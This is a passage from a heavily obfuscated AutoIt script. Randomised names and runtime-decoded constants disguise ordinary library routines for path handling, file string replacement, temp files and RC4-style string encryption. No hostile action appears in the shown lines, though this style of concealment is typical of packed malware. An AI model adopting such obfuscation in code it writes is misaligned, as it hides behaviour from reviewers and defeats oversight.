  7054.         If $a3800e12616 >= $a3a13220f40 Then
  7055.             $a1813723b32 &= $a0a13a25a14 & $a1f03a2610f[$a3800e12616]
  7056.         EndIf
  7057.         $a3800e12616 += Number($a5113b2281b)
  7058.     Next
  7059.     $a1813723b32 = StringTrimLeft($a1813723b32, Number($a5513c21105))
  7060.     $a3800e12616 = Number($a2c13d20018)
  7061.     For $a44e2d2442d = Number($a0713e22c1b) To $a1d03822b0a[Number($a4e13f2075c)]
  7062.         If $a3800e12616 > $a3a13220f40 Then
  7063.             $a1813723b32 = $a3d23023b09 & $a1813723b32
  7064.         EndIf
  7065.         $a3800e12616 += Number($a4523120632)
  7066.     Next
  7067.     If StringRight($a1813723b32, Number($a2123225503)) == $a4423323902 Then $a1813723b32 = StringTrimRight($a1813723b32, Number($a412342195b))
  7068.     Return $a1813723b32
  7069. EndFunc
  7070.  
  7071. Func a3a6110413d($a5123520a16, $a5c23625d46, $a0123722e04, $a3623822807)
  7072.     If NOT IsDeclared("SSA3A6110413D") Then
  7073.         Global $a5823923f61 = a2b00005424($os[6384]), $a2b23a2261d = a2b00005424($os[6385]), $a1723b24131 = a2b00005424($os[6386]), $a0323c26322 = a2b00005424($os[6387]), $a3923d25d4c = a2b00005424($os[6388]), $a5223e22d5b = a2b00005424($os[6389]), $a0723f25c3e = a2b00005424($os[6390]), $a3533022227 = a2b00005424($os[6391]), $a5333123324 = a2b00005424($os[6392]), $a293322335d = a2b00005424($os[6393]), $a053332502c = a2b00005424($os[6394]), $a483342310c = a2b00005424($os[6395])
  7074.         Global $ssa3a6110413d = 1
  7075.     EndIf
  7076.     If StringLen($a5123520a16) Then
  7077.         If NOT (StringLeft($a5123520a16, Number($a5823923f61)) = $a2b23a2261d) Then $a5123520a16 = StringLeft($a5123520a16, Number($a1723b24131)) & $a0323c26322
  7078.     EndIf
  7079.     If StringLen($a5c23625d46) Then
  7080.         If NOT (StringRight($a5c23625d46, Number($a3923d25d4c)) = $a5223e22d5b) AND NOT (StringRight($a5c23625d46, Number($a0723f25c3e)) = $a3533022227) Then $a5c23625d46 = $a5c23625d46 & $a5333123324
  7081.     EndIf
  7082.     If StringLen($a3623822807) Then
  7083.         If NOT (StringLeft($a3623822807, Number($a293322335d)) = $a053332502c) Then $a3623822807 = $a483342310c & $a3623822807
  7084.     EndIf
  7085.     Return $a5123520a16 & $a5c23625d46 & $a0123722e04 & $a3623822807
  7086. EndFunc
  7087.  
  7088. Func a1b6120303f($a103352421f, ByRef $a5123520a16, ByRef $a5c23625d46, ByRef $a0123722e04, ByRef $a3623822807)
  7089.     If NOT IsDeclared("SSA1B6120303F") Then
  7090.         Global $a0233c25f2f = a2b00005424($os[6396]), $a4b33d22846 = a2b00005424($os[6397]), $a5933e2522f = a2b00005424($os[6398]), $a0633f23c51 = a2b00005424($os[6399]), $a4843024938 = a2b00005424($os[6400]), $a1b43125b30 = a2b00005424($os[6401]), $a354322472e = a2b00005424($os[6402]), $a0043320835 = a2b00005424($os[6403]), $a1443424259 = a2b00005424($os[6404]), $a424352455d = a2b00005424($os[6405]), $a3343625743 = a2b00005424($os[6406]), $a4443722c19 = a2b00005424($os[6407]), $a2143821a49 = a2b00005424($os[6408]), $a324392410c = a2b00005424($os[6409]), $a0543a24951 = a2b00005424($os[6410]), $a6243b2184b = a2b00005424($os[6411]), $a2943c20a4f = a2b00005424($os[6412]), $a0143d20c15 = a2b00005424($os[6413]), $a5a43f2634a = a2b00005424($os[6414]), $a3b53023162 = a2b00005424($os[6415]), $a3453124e41 = a2b00005424($os[6416]), $a3853320322 = a2b00005424($os[6417]), $a2853421401 = a2b00005424($os[6418]), $a4353525919 = a2b00005424($os[6419]), $a2053625c5f = a2b00005424($os[6420]), $a415372630f = a2b00005424($os[6421]), $a1e53820313 = a2b00005424($os[6422]), $a0d53920f08 = a2b00005424($os[6423]), $a0753a22233 = a2b00005424($os[6424]), $a4953b22e01 = a2b00005424($os[6425]), $a4153c2561b = a2b00005424($os[6426]), $a4d53d21556 = a2b00005424($os[6427]), $a1353e2374d = a2b00005424($os[6428]), $a4c53f20206 = a2b00005424($os[6429])
  7091.         Global $ssa1b6120303f = 1
  7092.     EndIf
  7093.     Local $a4633622c43 = ""
  7094.     Local $a5933723552 = ""
  7095.     Local $a2833825731 = ""
  7096.     Local $a1c33926359 = ""
  7097.     Local $a4033a2445e
  7098.     Local $a5a33b26207[Number($a0233c25f2f)]
  7099.     $a5a33b26207[Number($a4b33d22846)] = $a103352421f
  7100.     If StringMid($a103352421f, Number($a5933e2522f), Number($a0633f23c51)) = $a4843024938 Then
  7101.         $a4633622c43 = StringLeft($a103352421f, Number($a1b43125b30))
  7102.         $a103352421f = StringTrimLeft($a103352421f, Number($a354322472e))
  7103.     ElseIf StringLeft($a103352421f, Number($a0043320835)) = $a1443424259 Then
  7104.         $a103352421f = StringTrimLeft($a103352421f, Number($a424352455d))
  7105.         $a4033a2445e = StringInStr($a103352421f, $a3343625743)
  7106.         If $a4033a2445e = Number($a4443722c19) Then $a4033a2445e = StringInStr($a103352421f, $a2143821a49)
  7107.         If $a4033a2445e = Number($a324392410c) Then
  7108.             $a4633622c43 = $a0543a24951 & $a103352421f
  7109.             $a103352421f = ""
  7110.         Else
  7111.             $a4633622c43 = $a6243b2184b & StringLeft($a103352421f, $a4033a2445e - Number($a2943c20a4f))
  7112.             $a103352421f = StringTrimLeft($a103352421f, $a4033a2445e - Number($a0143d20c15))
  7113.         EndIf
  7114.     EndIf
  7115.     Local $a5643e21b1a = StringInStr($a103352421f, $a5a43f2634a, Number($a3b53023162), -Number($a3453124e41))
  7116.     Local $a1853224e54 = StringInStr($a103352421f, $a3853320322, Number($a2853421401), -Number($a4353525919))
  7117.     If $a5643e21b1a >= $a1853224e54 Then
  7118.         $a4033a2445e = $a5643e21b1a
  7119.     Else
  7120.         $a4033a2445e = $a1853224e54
  7121.     EndIf
  7122.     $a5933723552 = StringLeft($a103352421f, $a4033a2445e)
  7123.     $a2833825731 = StringRight($a103352421f, StringLen($a103352421f) - $a4033a2445e)
  7124.     If StringLen($a5933723552) = Number($a2053625c5f) Then $a2833825731 = $a103352421f
  7125.     $a4033a2445e = StringInStr($a2833825731, $a415372630f, Number($a1e53820313), -Number($a0d53920f08))
  7126.     If $a4033a2445e Then
  7127.         $a1c33926359 = StringRight($a2833825731, StringLen($a2833825731) - ($a4033a2445e - Number($a0753a22233)))
  7128.         $a2833825731 = StringLeft($a2833825731, $a4033a2445e - Number($a4953b22e01))
  7129.     EndIf
  7130.     $a5123520a16 = $a4633622c43
  7131.     $a5c23625d46 = $a5933723552
  7132.     $a0123722e04 = $a2833825731
  7133.     $a3623822807 = $a1c33926359
  7134.     $a5a33b26207[Number($a4153c2561b)] = $a4633622c43
  7135.     $a5a33b26207[Number($a4d53d21556)] = $a5933723552
  7136.     $a5a33b26207[Number($a1353e2374d)] = $a2833825731
  7137.     $a5a33b26207[Number($a4c53f20206)] = $a1c33926359
  7138.     Return $a5a33b26207
  7139. EndFunc
  7140.  
  7141. Func a326130423c($a5763023719, $a626312343b, $a0263225a04, $a026332050a = 0, $a3563424f0a = 1)
  7142.     If NOT IsDeclared("SSA326130423C") Then
  7143.         Global $a4663520d08 = a2b00005424($os[6430]), $a026372265d = a2b00005424($os[6431]), $a0a63823807 = a2b00005424($os[6432]), $a1f63922663 = a2b00005424($os[6433]), $a0563a21d3c = a2b00005424($os[6434]), $a4363b20225 = a2b00005424($os[6435]), $a3c63c20353 = a2b00005424($os[6436]), $a5463d26341 = a2b00005424($os[6437]), $a5d63e25523 = a2b00005424($os[6438]), $a1f73023e02 = a2b00005424($os[6439]), $a3c7312273f = a2b00005424($os[6440]), $a477322372d = a2b00005424($os[6441]), $a1a73322834 = a2b00005424($os[6442]), $a4a73422a2b = a2b00005424($os[6443]), $a6273526031 = a2b00005424($os[6444]), $a0073622160 = a2b00005424($os[6445]), $a5b73724300 = a2b00005424($os[6446]), $a1473824203 = a2b00005424($os[6447]), $a5f73a25d26 = a2b00005424($os[6448]), $a5e73c2291a = a2b00005424($os[6449]), $a4473d2174f = a2b00005424($os[6450]), $a2f73e2423c = a2b00005424($os[6451]), $a2e73f25411 = a2b00005424($os[6452]), $a228302395b = a2b00005424($os[6453]), $a288312083e = a2b00005424($os[6454]), $a4b83224540 = a2b00005424($os[6455]), $a5283326107 = a2b00005424($os[6456]), $a0483424e1d = a2b00005424($os[6457]), $a5e83525303 = a2b00005424($os[6458]), $a0383625b15 = a2b00005424($os[6459]), $a5e83725110 = a2b00005424($os[6460]), $a4183820748 = a2b00005424($os[6461]), $a4d83926027 = a2b00005424($os[6462]), $a5c83a2031e = a2b00005424($os[6463]), $a0983b24907 = a2b00005424($os[6464]), $a0183c2580f = a2b00005424($os[6465])
  7144.         Global $ssa326130423c = 1
  7145.     EndIf
  7146.     Local $a373aa11e13 = Number($a4663520d08)
  7147.     Local $a53af900c1c, $a3363621c22
  7148.     If StringInStr(FileGetAttrib($a5763023719), $a026372265d) Then Return SetError(Number($a0a63823807), Number($a1f63922663), -Number($a0563a21d3c))
  7149.     Local $a28cec03a24 = FileOpen($a5763023719, $a456a602d07)
  7150.     If $a28cec03a24 = -Number($a4363b20225) Then Return SetError(Number($a3c63c20353), Number($a5463d26341), -Number($a5d63e25523))
  7151.     Local $a0a63f2052f = FileRead($a28cec03a24, FileGetSize($a5763023719))
  7152.     If StringRight($a0a63f2052f, Number($a1f73023e02)) = Execute($a3c7312273f) Then
  7153.         $a3363621c22 = Execute($a477322372d)
  7154.     ElseIf StringRight($a0a63f2052f, Number($a1a73322834)) = Execute($a4a73422a2b) Then
  7155.         $a3363621c22 = Execute($a6273526031)
  7156.     ElseIf StringRight($a0a63f2052f, Number($a0073622160)) = Execute($a5b73724300) Then
  7157.         $a3363621c22 = Execute($a1473824203)
  7158.     Else
  7159.         $a3363621c22 = ""
  7160.     EndIf
  7161.     Local $a517392252d = StringSplit(StringStripCR($a0a63f2052f), Execute($a5f73a25d26))
  7162.     FileClose($a28cec03a24)
  7163.     Local $a4bb2a20308 = FileGetEncoding($a5763023719)
  7164.     Local $a5e73b21d59 = FileOpen($a5763023719, $a4bb2a20308 + $a5f6aa05a32)
  7165.     If $a5e73b21d59 = -Number($a5e73c2291a) Then Return SetError(Number($a4473d2174f), Number($a2f73e2423c), -Number($a2e73f25411))
  7166.     For $a53af900c1c = Number($a228302395b) To $a517392252d[Number($a288312083e)]
  7167.         If StringInStr($a517392252d[$a53af900c1c], $a626312343b, $a026332050a) Then
  7168.             $a517392252d[$a53af900c1c] = StringReplace($a517392252d[$a53af900c1c], $a626312343b, $a0263225a04, Number($a4b83224540) - $a3563424f0a, $a026332050a)
  7169.             $a373aa11e13 = $a373aa11e13 + Number($a5283326107)
  7170.             If $a3563424f0a = Number($a0483424e1d) Then
  7171.                 $a373aa11e13 = Number($a5e83525303)
  7172.                 ExitLoop
  7173.             EndIf
  7174.         EndIf
  7175.     Next
  7176.     For $a53af900c1c = Number($a0383625b15) To $a517392252d[Number($a5e83725110)] - Number($a4183820748)
  7177.         If FileWriteLine($a5e73b21d59, $a517392252d[$a53af900c1c]) = Number($a4d83926027) Then
  7178.             FileClose($a5e73b21d59)
  7179.             Return SetError(Number($a5c83a2031e), Number($a0983b24907), -Number($a0183c2580f))
  7180.         EndIf
  7181.     Next
  7182.     If $a517392252d[$a53af900c1c] <> "" Then FileWrite($a5e73b21d59, $a517392252d[$a53af900c1c] & $a3363621c22)
  7183.     FileClose($a5e73b21d59)
  7184.     Return $a373aa11e13
  7185. EndFunc
  7186.  
  7187. Func a0561401457($a4083d21239 = @TempDir, $a3e83e2111d = "~", $a0783f25328 = ".tmp", $a3c93023b33 = 7)
  7188.     If NOT IsDeclared("SSA0561401457") Then
  7189.         Global $a5993121314 = a2b00005424($os[6466]), $a4593222c1f = a2b00005424($os[6467]), $a0a93320a09 = a2b00005424($os[6468]), $a4793422d1d = a2b00005424($os[6469]), $a4593525655 = a2b00005424($os[6470]), $a6193620234 = a2b00005424($os[6471]), $a3293724c10 = a2b00005424($os[6472]), $a0593825216 = a2b00005424($os[6473]), $a1093a20958 = a2b00005424($os[6474]), $a5293b25d17 = a2b00005424($os[6475]), $a4b93c22e20 = a2b00005424($os[6476])
  7190.         Global $ssa0561401457 = 1
  7191.     EndIf
  7192.     If IsKeyword($a3e83e2111d) Then $a3e83e2111d = $a5993121314
  7193.     If IsKeyword($a0783f25328) Then $a0783f25328 = $a4593222c1f
  7194.     If IsKeyword($a3c93023b33) Then $a3c93023b33 = Number($a0a93320a09)
  7195.     If NOT FileExists($a4083d21239) Then $a4083d21239 = Execute($a4793422d1d)
  7196.     If NOT FileExists($a4083d21239) Then $a4083d21239 = Execute($a4593525655)
  7197.     If StringRight($a4083d21239, Number($a6193620234)) <> $a3293724c10 Then $a4083d21239 = $a4083d21239 & $a0593825216
  7198.     Local $a4193923d40
  7199.     Do
  7200.         $a4193923d40 = ""
  7201.         While StringLen($a4193923d40) < $a3c93023b33
  7202.             $a4193923d40 = $a4193923d40 & Chr(Random(Number($a1093a20958), Number($a5293b25d17), Number($a4b93c22e20)))
  7203.         WEnd
  7204.         $a4193923d40 = $a4083d21239 & $a3e83e2111d & $a4193923d40 & $a0783f25328
  7205.     Until NOT FileExists($a4193923d40)
  7206.     Return $a4193923d40
  7207. EndFunc
  7208.  
  7209. Func a6261506159($a1993d24033)
  7210.     If NOT IsDeclared("SSA6261506159") Then
  7211.         Global $a2f93e20732 = a2b00005424($os[6477]), $a2793f26249 = a2b00005424($os[6478]), $a31a3025434 = a2b00005424($os[6479])
  7212.         Global $ssa6261506159 = 1
  7213.     EndIf
  7214.     If StringLeft($a1993d24033, Number($a2f93e20732)) = $a2793f26249 Then Return BinaryToString($a1993d24033)
  7215.     Return BinaryToString($a31a3025434 & $a1993d24033)
  7216. EndFunc
  7217.  
  7218. Func a0b61600a17($a2ca3123425, $a30a322270f, $a2ca3321819, $a2da3426231 = -1)
  7219.     If NOT IsDeclared("SSA0B61600A17") Then
  7220.         Global $a00a362333f = a2b00005424($os[6480]), $a0fa3725c14 = a2b00005424($os[6481]), $a10a3920954 = a2b00005424($os[6482]), $a11a3a2335d = a2b00005424($os[6483]), $a03a3b2440c = a2b00005424($os[6484]), $a48a3c20017 = a2b00005424($os[6485]), $a18a3d25232 = a2b00005424($os[6486]), $a1da3e22a20 = a2b00005424($os[6487]), $a54a3f20a05 = a2b00005424($os[6488]), $a18b302573c = a2b00005424($os[6489]), $a3cb3120f41 = a2b00005424($os[6490]), $a46b3220d08 = a2b00005424($os[6491]), $a5bb3322634 = a2b00005424($os[6492])
  7221.         Global $ssa0b61600a17 = 1
  7222.     EndIf
  7223.     Local $a02a3525e11 = ""
  7224.     If $a2da3426231 = Default OR $a2da3426231 = -Number($a00a362333f) Then $a02a3525e11 = $a0fa3725c14
  7225.     Local $a18a3824a21 = $a10a3920954
  7226.     $a30a322270f = StringRegExpReplace($a30a322270f, $a18a3824a21, $a11a3a2335d)
  7227.     $a2ca3321819 = StringRegExpReplace($a2ca3321819, $a18a3824a21, $a03a3b2440c)
  7228.     If $a30a322270f = "" Then $a30a322270f = $a48a3c20017
  7229.     If $a2ca3321819 = "" Then $a2ca3321819 = $a18a3d25232
  7230.     Local $a2232725542 = StringRegExp($a2ca3123425, $a1da3e22a20 & $a02a3525e11 & $a30a322270f & $a54a3f20a05 & $a2ca3321819, Number($a18b302573c))
  7231.     If @error Then Return SetError(Number($a3cb3120f41), Number($a46b3220d08), Number($a5bb3322634))
  7232.     Return $a2232725542
  7233. EndFunc
  7234.  
  7235. Func a476170141c($a5fb3426363, $a11b3521550, $a00b3623b40, $a08b3720a23 = 1)
  7236.     If NOT IsDeclared("SSA476170141C") Then
  7237.         Global $a2bb3821d34 = a2b00005424($os[6493]), $a2cb3925e20 = a2b00005424($os[6494]), $a5db3a2375f = a2b00005424($os[6495]), $a3bb3b24e04 = a2b00005424($os[6496]), $a32b3c2214e = a2b00005424($os[6497]), $a04b3d2595b = a2b00005424($os[6498]), $a08b3e24d31 = a2b00005424($os[6499]), $a3bb3f20e54 = a2b00005424($os[6500]), $a06c3523a51 = a2b00005424($os[6501]), $a1dc3620022 = a2b00005424($os[6502]), $a18c3e2311f = a2b00005424($os[6503]), $a54d3023c05 = a2b00005424($os[6504]), $a62d3125b61 = a2b00005424($os[6505]), $a58d3220d12 = a2b00005424($os[6506]), $a5dd3322425 = a2b00005424($os[6507]), $a2ad342164b = a2b00005424($os[6508]), $a05d3523645 = a2b00005424($os[6509]), $a3cd3625124 = a2b00005424($os[6510]), $a21d3721954 = a2b00005424($os[6511]), $a30d3825f4a = a2b00005424($os[6512]), $a5ed3925963 = a2b00005424($os[6513]), $a4ad3a2144c = a2b00005424($os[6514]), $a04d3b21916 = a2b00005424($os[6515]), $a09d3c25538 = a2b00005424($os[6516]), $a13d3d2545b = a2b00005424($os[6517]), $a45d3e22a1a = a2b00005424($os[6518]), $a3bd3f20629 = a2b00005424($os[6519]), $a32e302511e = a2b00005424($os[6520]), $a03e312431a = a2b00005424($os[6521]), $a28e3225b3e = a2b00005424($os[6522]), $a46e3323629 = a2b00005424($os[6523]), $a0ce3423401 = a2b00005424($os[6524]), $a13e3524143 = a2b00005424($os[6525]), $a02e3622a09 = a2b00005424($os[6526]), $a37e3722b4c = a2b00005424($os[6527]), $a13e382410f = a2b00005424($os[6528]), $a14e3922a43 = a2b00005424($os[6529]), $a33e3a2041b = a2b00005424($os[6530]), $a03e3b23816 = a2b00005424($os[6531]), $a4be3c26232 = a2b00005424($os[6532]), $a0ce3d24653 = a2b00005424($os[6533]), $a4be3e22d61 = a2b00005424($os[6534]), $a4fe3f23426 = a2b00005424($os[6535]), $a27f3024353 = a2b00005424($os[6536]), $a42f312032b = a2b00005424($os[6537]), $a1ef3224d21 = a2b00005424($os[6538]), $a5df3321144 = a2b00005424($os[6539]), $a23f3425a15 = a2b00005424($os[6540]), $a36f3522345 = a2b00005424($os[6541]), $a4af3620a3d = a2b00005424($os[6542]), $a1ff3721b31 = a2b00005424($os[6543]), $a27f382455b = a2b00005424($os[6544])
  7238.         Global $a48f3923006 = a2b00005424($os[6545]), $a1af3a20a50 = a2b00005424($os[6546]), $a24f3b20509 = a2b00005424($os[6547]), $a00f3c2584f = a2b00005424($os[6548]), $a37f3d21329 = a2b00005424($os[6549]), $a2df3e24a06 = a2b00005424($os[6550]), $a56f3f25812 = a2b00005424($os[6551]), $a5e04020013 = a2b00005424($os[6552]), $a5504121841 = a2b00005424($os[6553]), $a4f0422582b = a2b00005424($os[6554]), $a0804323851 = a2b00005424($os[6555]), $a0e0442234a = a2b00005424($os[6556]), $a0304523247 = a2b00005424($os[6557]), $a2004621707 = a2b00005424($os[6558]), $a2304720a4c = a2b00005424($os[6559]), $a0c04823753 = a2b00005424($os[6560]), $a6204923d0a = a2b00005424($os[6561]), $a1404a23746 = a2b00005424($os[6562]), $a5f04b25f32 = a2b00005424($os[6563]), $a3404c2114b = a2b00005424($os[6564]), $a5304d23a49 = a2b00005424($os[6565]), $a1204e22331 = a2b00005424($os[6566]), $a2304f2393e = a2b00005424($os[6567]), $a4514021153 = a2b00005424($os[6568]), $a5414124333 = a2b00005424($os[6569]), $a2314221d54 = a2b00005424($os[6570]), $a1514321f51 = a2b00005424($os[6571]), $a3214421e03 = a2b00005424($os[6572]), $a4814521c29 = a2b00005424($os[6573]), $a0714623227 = a2b00005424($os[6574]), $a5714721f16 = a2b00005424($os[6575]), $a251482005a = a2b00005424($os[6576]), $a271492252e = a2b00005424($os[6577])
  7239.         Global $ssa476170141c = 1
  7240.     EndIf
  7241.     If $a5fb3426363 <> Number($a2bb3821d34) AND $a5fb3426363 <> Number($a2cb3925e20) Then
  7242.         SetError(Number($a5db3a2375f), Number($a3bb3b24e04), "")
  7243.     ElseIf $a11b3521550 = "" OR $a00b3623b40 = "" Then
  7244.         SetError(Number($a32b3c2214e), Number($a04b3d2595b), "")
  7245.     Else
  7246.         If Number($a08b3720a23) <= Number($a08b3e24d31) OR Int($a08b3720a23) <> $a08b3720a23 Then $a08b3720a23 = Number($a3bb3f20e54)
  7247.         Local $a4ec3025f34
  7248.         Local $a26c3120254
  7249.         Local $a04c3221f11
  7250.         Local $a45c3320e4d
  7251.         Local $a0dc3425211[Number($a06c3523a51)][Number($a1dc3620022)]
  7252.         Local $a16c3721717
  7253.         Local $a01c3821b31
  7254.         Local $a4ec3921e00
  7255.         Local $a3dc3a22508
  7256.         Local $a51c3b20438
  7257.         Local $a2ac3c2402a
  7258.         Local $a5dc3d20b1f
  7259.         If $a5fb3426363 = Number($a18c3e2311f) Then
  7260.             For $a61c3f21724 = Number($a54d3023c05) To $a08b3720a23 Step Number($a62d3125b61)
  7261.                 $a04c3221f11 = ""
  7262.                 $a26c3120254 = ""
  7263.                 $a4ec3025f34 = ""
  7264.                 For $a04c3221f11 = Number($a58d3220d12) To StringLen($a11b3521550)
  7265.                     If $a26c3120254 = StringLen($a00b3623b40) Then
  7266.                         $a26c3120254 = Number($a5dd3322425)
  7267.                     Else
  7268.                         $a26c3120254 += Number($a2ad342164b)
  7269.                     EndIf
  7270.                     $a4ec3025f34 = $a4ec3025f34 & Chr(BitXOR(Asc(StringMid($a11b3521550, $a04c3221f11, Number($a05d3523645))), Asc(StringMid($a00b3623b40, $a26c3120254, Number($a3cd3625124))), Number($a21d3721954)))
  7271.                 Next
  7272.                 $a11b3521550 = $a4ec3025f34
  7273.                 $a16c3721717 = ""
  7274.                 $a01c3821b31 = Number($a30d3825f4a)
  7275.                 $a4ec3921e00 = ""
  7276.                 $a3dc3a22508 = ""
  7277.                 $a51c3b20438 = ""
  7278.                 $a5dc3d20b1f = ""
  7279.                 $a2ac3c2402a = ""
  7280.                 $a45c3320e4d = ""
  7281.                 $a0dc3425211 = ""
  7282.                 Local $a0dc3425211[Number($a5ed3925963)][Number($a4ad3a2144c)]
  7283.                 For $a16c3721717 = Number($a04d3b21916) To Number($a09d3c25538)
  7284.                     $a0dc3425211[$a16c3721717][Number($a13d3d2545b)] = Asc(StringMid($a00b3623b40, Mod($a16c3721717, StringLen($a00b3623b40)) + Number($a45d3e22a1a), Number($a3bd3f20629)))
  7285.                     $a0dc3425211[$a16c3721717][Number($a32e302511e)] = $a16c3721717
  7286.                 Next
  7287.                 For $a16c3721717 = Number($a03e312431a) To Number($a28e3225b3e)
  7288.                     $a01c3821b31 = Mod(($a01c3821b31 + $a0dc3425211[$a16c3721717][Number($a46e3323629)] + $a0dc3425211[$a16c3721717][Number($a0ce3423401)]), Number($a13e3524143))
  7289.                     $a45c3320e4d = $a0dc3425211[$a16c3721717][Number($a02e3622a09)]
  7290.                     $a0dc3425211[$a16c3721717][Number($a37e3722b4c)] = $a0dc3425211[$a01c3821b31][Number($a13e382410f)]
  7291.                     $a0dc3425211[$a01c3821b31][Number($a14e3922a43)] = $a45c3320e4d
  7292.                 Next
  7293.                 For $a16c3721717 = Number($a33e3a2041b) To StringLen($a11b3521550)
  7294.                     $a4ec3921e00 = Mod(($a4ec3921e00 + Number($a03e3b23816)), Number($a4be3c26232))
  7295.                     $a3dc3a22508 = Mod(($a3dc3a22508 + $a0dc3425211[$a4ec3921e00][Number($a0ce3d24653)]), Number($a4be3e22d61))
  7296.                     $a51c3b20438 = $a0dc3425211[Mod(($a0dc3425211[$a4ec3921e00][Number($a4fe3f23426)] + $a0dc3425211[$a3dc3a22508][Number($a27f3024353)]), Number($a42f312032b))][Number($a1ef3224d21)]
  7297.                     $a5dc3d20b1f = BitXOR(Asc(StringMid($a11b3521550, $a16c3721717, Number($a5df3321144))), $a51c3b20438)
  7298.                     $a2ac3c2402a &= Hex($a5dc3d20b1f, Number($a23f3425a15))
  7299.                 Next
  7300.                 $a11b3521550 = $a2ac3c2402a
  7301.             Next
  7302.         Else
  7303.             For $a61c3f21724 = Number($a36f3522345) To $a08b3720a23 Step Number($a4af3620a3d)
  7304.                 $a01c3821b31 = Number($a1ff3721b31)
  7305.                 $a4ec3921e00 = ""
  7306.                 $a3dc3a22508 = ""
  7307.                 $a51c3b20438 = ""
  7308.                 $a5dc3d20b1f = ""
  7309.                 $a2ac3c2402a = ""
  7310.                 $a45c3320e4d = ""
  7311.                 $a0dc3425211 = ""
  7312.                 Local $a0dc3425211[Number($a27f382455b)][Number($a48f3923006)]
  7313.                 For $a16c3721717 = Number($a1af3a20a50) To Number($a24f3b20509)
  7314.                     $a0dc3425211[$a16c3721717][Number($a00f3c2584f)] = Asc(StringMid($a00b3623b40, Mod($a16c3721717, StringLen($a00b3623b40)) + Number($a37f3d21329), Number($a2df3e24a06)))
  7315.                     $a0dc3425211[$a16c3721717][Number($a56f3f25812)] = $a16c3721717
  7316.                 Next
  7317.                 For $a16c3721717 = Number($a5e04020013) To Number($a5504121841)
  7318.                     $a01c3821b31 = Mod(($a01c3821b31 + $a0dc3425211[$a16c3721717][Number($a4f0422582b)] + $a0dc3425211[$a16c3721717][Number($a0804323851)]), Number($a0e0442234a))
  7319.                     $a45c3320e4d = $a0dc3425211[$a16c3721717][Number($a0304523247)]
  7320.                     $a0dc3425211[$a16c3721717][Number($a2004621707)] = $a0dc3425211[$a01c3821b31][Number($a2304720a4c)]
  7321.                     $a0dc3425211[$a01c3821b31][Number($a0c04823753)] = $a45c3320e4d
  7322.                 Next
  7323.                 For $a16c3721717 = Number($a6204923d0a) To StringLen($a11b3521550) Step Number($a1404a23746)
  7324.                     $a4ec3921e00 = Mod(($a4ec3921e00 + Number($a5f04b25f32)), Number($a3404c2114b))
  7325.                     $a3dc3a22508 = Mod(($a3dc3a22508 + $a0dc3425211[$a4ec3921e00][Number($a5304d23a49)]), Number($a1204e22331))
  7326.                     $a51c3b20438 = $a0dc3425211[Mod(($a0dc3425211[$a4ec3921e00][Number($a2304f2393e)] + $a0dc3425211[$a3dc3a22508][Number($a4514021153)]), Number($a5414124333))][Number($a2314221d54)]
  7327.                     $a5dc3d20b1f = BitXOR(Dec(StringMid($a11b3521550, $a16c3721717, Number($a1514321f51))), $a51c3b20438)
  7328.                     $a2ac3c2402a = $a2ac3c2402a & Chr($a5dc3d20b1f)
  7329.                 Next
  7330.                 $a11b3521550 = $a2ac3c2402a
  7331.                 $a04c3221f11 = ""
  7332.                 $a26c3120254 = ""
  7333.                 $a4ec3025f34 = ""
  7334.                 For $a04c3221f11 = Number($a3214421e03) To StringLen($a11b3521550)
  7335.                     If $a26c3120254 = StringLen($a00b3623b40) Then
  7336.                         $a26c3120254 = Number($a4814521c29)
  7337.                     Else
  7338.                         $a26c3120254 += Number($a0714623227)
  7339.                     EndIf
  7340.                     $a4ec3025f34 &= Chr(BitXOR(Asc(StringMid($a11b3521550, $a04c3221f11, Number($a5714721f16))), Asc(StringMid($a00b3623b40, $a26c3120254, Number($a251482005a))), Number($a271492252e)))
  7341.                 Next
  7342.                 $a11b3521550 = $a4ec3025f34
  7343.             Next
  7344.         EndIf
  7345.         Return $a11b3521550
  7346.     EndIf
  7347. EndFunc
  7348.  
  7349. Func a4a61805b5d($a156e804051, $a6014a24c5d, $a4414b23c32 = 0)
  7350.     If NOT IsDeclared("SSA4A61805B5D") Then
  7351.         Global $a4f14c2304f = a2b00005424($os[6578]), $a5914d23430 = a2b00005424($os[6579]), $a0714e2480b = a2b00005424($os[6580]), $a4c14f23f44 = a2b00005424($os[6581]), $a6124025a15 = a2b00005424($os[6582]), $a6024122425 = a2b00005424($os[6583]), $a0424224a55 = a2b00005424($os[6584])
  7352.         Global $ssa4a61805b5d = 1
  7353.     EndIf
  7354.     If $a4414b23c32 > Number($a4f14c2304f) Then
  7355.         $a156e804051 = StringReplace($a156e804051, $a6014a24c5d, Chr(Number($a5914d23430)), $a4414b23c32)
  7356.         $a6014a24c5d = Chr(Number($a0714e2480b))
  7357.     ElseIf $a4414b23c32 < Number($a4c14f23f44) Then
  7358.         Local $a577e20612b = StringInStr($a156e804051, $a6014a24c5d, Number($a6124025a15), $a4414b23c32)
  7359.         If $a577e20612b Then
  7360.             $a156e804051 = StringLeft($a156e804051, $a577e20612b - Number($a6024122425))
  7361.         EndIf
  7362.     EndIf
  7363.     Return StringSplit($a156e804051, $a6014a24c5d, Number($a0424224a55))
  7364. EndFunc
  7365.  
  7366. Func a046190064b($a2ca3123425, $a1324324c06, $a4f24425754)
  7367.     If NOT IsDeclared("SSA046190064B") Then
  7368.         Global $a0a24620104 = a2b00005424($os[6585]), $a5a24721811 = a2b00005424($os[6586]), $a2d24820c1f = a2b00005424($os[6587]), $a5b2492104b = a2b00005424($os[6588]), $a5424a21f37 = a2b00005424($os[6589]), $a2f24b2320b = a2b00005424($os[6590]), $a5a24c20f53 = a2b00005424($os[6591]), $a0324d23c42 = a2b00005424($os[6592]), $a5024e2032e = a2b00005424($os[6593])
  7369.         Global $ssa046190064b = 1
  7370.     EndIf
  7371.     Local $a1e24524524, $a30a322270f, $a2ca3321819
  7372.     If $a2ca3123425 = "" OR (NOT IsString($a2ca3123425)) Then
  7373.         Return SetError(Number($a0a24620104), Number($a5a24721811), $a2ca3123425)
  7374.     ElseIf $a1324324c06 = "" OR (NOT IsString($a2ca3123425)) Then
  7375.         Return SetError(Number($a2d24820c1f), Number($a5b2492104b), $a2ca3123425)
  7376.     Else
  7377.         $a1e24524524 = StringLen($a2ca3123425)
  7378.         If (Abs($a4f24425754) > $a1e24524524) OR (NOT IsInt($a4f24425754)) Then
  7379.             Return SetError(Number($a5424a21f37), Number($a2f24b2320b), $a2ca3123425)
  7380.         EndIf
  7381.     EndIf
  7382.     If $a4f24425754 = Number($a5a24c20f53) Then
  7383.         Return $a1324324c06 & $a2ca3123425
